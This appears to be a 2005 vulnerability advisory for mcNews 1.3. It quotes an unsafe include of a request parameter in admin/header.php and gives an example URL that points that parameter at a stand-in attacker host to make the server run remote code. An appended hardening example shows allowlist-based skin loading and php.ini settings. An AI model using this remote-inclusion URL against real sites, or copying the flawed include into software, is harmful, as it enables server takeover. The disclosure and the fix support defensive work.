-- == -- == -- == -- == -- == -- == -- == -- == -- == --
Name: PHP mcNews
Version: 1.3
Homepage: http://www.phpforums.net/index.php?dir=dld
Author: Filip Groszynski (VXSfx)
Date: 7 March 2005
-- == -- == -- == -- == -- == -- == -- == -- == -- == --

Vulnerable code in mcNews/admin/header.php:

<?
// mcNews 1.3 Marc Cagninacci marc@xxxxxxxxxxxxx
?>
...
<?
if($voir!='')
{
$skinfile=strstr($skinfile, 'skin');
include ("$skinfile");
?>
...

--------------------------------------------------------

Example:

if register_globals=on and allow_url_fopen=on:

http://[victim]/[dir]/mcNews/admin/header.php?skinfile=http://[hacker_box]/

--------------------------------------------------------

Contact:

Author: Filip Groszynski <VXSfx>
Location: Poland <Warsaw>
Email: groszynskif <at> gmail <dot> com
HP: http://shell.homeunix.org

-- == -- == -- == -- == -- == -- == -- == -- == -- == --
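
Added example, not part of the original advisory and not mcNews code: one way to harden the include shown above is to resolve a bare skin name against a fixed directory instead of including the request value. The skins directory, the resolve_skin() helper and the 'default' skin name are assumptions.

```php
<?php
// Added example (not mcNews code): allowlist-style skin loading.
// SKIN_DIR, resolve_skin() and the 'default' skin are hypothetical names.
const SKIN_DIR = __DIR__ . '/skins';

/** Return the full path of a skin inside $skinDir, or null if rejected. */
function resolve_skin(?string $requested, string $skinDir = SKIN_DIR): ?string
{
    // Bare name only: no slashes, dots, URL schemes or stream wrappers.
    if ($requested === null || !preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $requested)) {
        return null;
    }
    $base = realpath($skinDir);
    if ($base === false) {
        return null;
    }
    // realpath() follows symlinks, so confirm the result is still under $base.
    $path = realpath($base . DIRECTORY_SEPARATOR . $requested . '.php');
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

if (PHP_SAPI === 'cli') {
    // Constructed inputs; a bare name is accepted only if the file exists.
    foreach (['blue', 'skin/blue', '../config', 'http://example.invalid/'] as $name) {
        printf("%-26s => %s\n", $name, resolve_skin($name) ?? 'rejected');
    }
} else {
    // Read the parameter explicitly instead of relying on register_globals.
    $raw = $_GET['skinfile'] ?? null;
    $skin = resolve_skin(is_string($raw) ? $raw : null) ?? resolve_skin('default');
    if ($skin !== null) {
        include $skin;
    }
}
```

With allow_url_fopen and register_globals set to Off in php.ini, the two preconditions named in the advisory no longer hold. On PHP 5.2 and later, allow_url_include separately controls whether include accepts URLs.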